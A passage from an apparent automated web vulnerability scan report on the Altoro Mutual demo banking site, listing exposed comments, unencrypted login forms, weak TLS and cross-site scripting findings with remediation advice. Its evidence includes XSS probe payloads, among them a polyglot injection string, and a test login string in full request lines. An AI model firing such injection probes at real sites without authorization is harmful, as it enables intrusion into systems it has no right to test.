Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 391 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 392 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://65.61.137.117:8443/disclaimer.htm?url=http://www.netscape.c
om
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
https://65.61.137.117:8443/disclaimer.htm?url=http://www.netscape.c
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 393 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 394 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://65.61.137.117/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
https://65.61.137.117/disclaimer.htm?url=http://www.netscape.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 395 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 396 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://65.61.137.117/doLogin
Potentially sensitive comments found
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 397 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 398 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://demo.testfire.net:8443/disclaimer.htm?url=http://www.netscape
.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
https://demo.testfire.net:8443/disclaimer.htm?url=http://www.netscape
.com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 399 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/index.jsp?content=inside_contact.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 400 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 401 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://demo.testfire.net/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Remediation:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 402 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 403 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 404 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET http://demo.testfire.net/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 405 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://65.61.137.117/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
http://65.61.137.117/disclaimer.htm?url=http://www.netscape.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 406 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://65.61.137.117/doLogin
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 407 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 408 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
119 Web Page Transmits Login 4.6 Medium Fail URL: http://65.61.137.117/login.jsp
Credentials Without Port: tcp/80
Encryption
There is a web page on this host that transmits login credentials over
HTTP, which is a clear-text protocol. As such, if an attacker was able to
intercept traffic containing login credentials, it would be trivial to view
user account and password information.
CVSSv2: AV:A/AC:H/Au:N/C:C/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Form Name: login
Action: http://65.61.137.117:80/doLogin
Fields: uid (text), passw (password), btnSubmit (submit)
Location: http://65.61.137.117/login.jsp
Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.
120 Web Page Transmits Login 4.6 Medium Fail URL: http://demo.testfire.net:8080/login.jsp
Credentials Without Port: tcp/8080
Encryption
There is a web page on this host that transmits login credentials over
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 409 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:H/Au:N/C:C/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Form Name: login
Action: http://demo.testfire.net:8080/doLogin
Fields: uid (text), passw (password), btnSubmit (submit)
Location: http://demo.testfire.net:8080/login.jsp
Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.
121 Web Page Transmits Login 4.6 Medium Fail URL: http://65.61.137.117:8080/login.jsp
Credentials Without Port: tcp/8080
Encryption
There is a web page on this host that transmits login credentials over
HTTP, which is a clear-text protocol. As such, if an attacker was able to
intercept traffic containing login credentials, it would be trivial to view
user account and password information.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 410 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
Form Name: login
Action: http://65.61.137.117:8080/doLogin
Fields: uid (text), passw (password), btnSubmit (submit)
Location: http://65.61.137.117:8080/login.jsp
Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.
122 Web Page Transmits Login 4.6 Medium Fail URL: http://demo.testfire.net/login.jsp
Credentials Without Port: tcp/80
Encryption
There is a web page on this host that transmits login credentials over
HTTP, which is a clear-text protocol. As such, if an attacker was able to
intercept traffic containing login credentials, it would be trivial to view
user account and password information.
CVSSv2: AV:A/AC:H/Au:N/C:C/I:N/A:N
Service: http
Application: apache:tomcat
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 411 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.
123 CVE-2011-3389 SSLv2, SSLv3 and TLS v1.0 4.3 Medium Fail Port: tcp/443
Vulnerable to CBC Attacks
via chosen-plaintext This server supports a version of SSL vulnerable to a Cipher Block
(BEAST) Chaining (CBC) attack. When using a block-based cipher with SSLv2,
SSLv3 or TLS v1.0, it is possible to perform a cryptographic attack
called a chosen-plaintext attack. An attack, commonly known as
"Browser Exploit Against SSL/TLS" ("BEAST") takes advantage of this
vulnerability in how the browser sets up SSL/TLS connections (e.g. for
HTTPS), and may allow an attacker to decrypt the SSL/TLS connection
to gain access to sensitive information. Although, the BEAST attack is
the only known exploit, other services not related to web servers (e.g.
IMAP) may also be vulnerable to such attack.
CVE: CVE-2011-3389
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 412 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://httpd.apache.org/docs/trunk/mod/mod_ssl.html#sslciphersuite
http://support.microsoft.com/kb/2643584
http://technet.microsoft.com/en-us/security/advisory/2588513
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Remediation:
The server should be configured to allow only TLS versions 1.1 and 1.2,
which are not vulnerable to this CBC attack. Although the latest
versions of all major web browsers support TLS 1.1 and 1.2 enabled by
default, disabling previous versions may prevent other services than
HTTP from connecting to the server if they do not support these
versions of TLS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 413 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net:8443/util/serverStatusCheckService.jsp?HostN
ame=%3Cscript%3Ealert%2815650661.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650661.00947)</script>
Detection: An alert was detected containing 15650661.00947
Request: GET https://demo.testfire.net:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 414 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 415 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650658.00617)//>*/alert(15650658.00617)/*
Detection: An alert was detected containing 15650658.00617
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 416 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650658.00617%29%2F%
2F%3E*%2Falert%2815650658.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 417 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET - https://65.61.137.117:8443/util/serverStatusCheckService.jsp?
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 418 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
https://65.61.137.117:8443/util/serverStatusCheckService.jsp?HostNam
e=%3Cscript%3Ealert%2815650661.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: https://65.61.137.117:8443/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 419 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 420 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 421 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 422 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117:8080/search.jsp?query=%3Cscript%3Ealert%2815
650660.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650660.00037)</script>
Detection: An alert was detected containing 15650660.00037
Request: GET
http://65.61.137.117:8080/search.jsp?query=%3Cscript%3Ealert%2815
650660.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 423 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28O
TG-SESS-002%29
Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = 76aa5ac0228d700d9219ed73f9533b78
Path = /
Host = 65.61.137.117
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://65.61.137.117:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 424 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Secure flag must be set for Session Cookies for Application served over
SSL.
For all Session cookies, HTTPOnly flag would limit session access in
cases of Cross-Site Scripting issues. Proper Caching headers should be
set for responses carrying the cookie.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 425 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117:8443/search.jsp?query=%3Cscript%3Ealert%281
5650661.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650661.00037)</script>
Detection: An alert was detected containing 15650661.00037
Request: GET
https://65.61.137.117:8443/search.jsp?query=%3Cscript%3Ealert%281
5650661.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 426 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 427 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%2
F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscrip
t%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650656.00127%29%2F%
2F%3E*%2Falert%2815650656.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650656.00127)//>*/alert(15650656.00127)/*
Detection: An alert was detected containing 15650656.00127
Request: GET
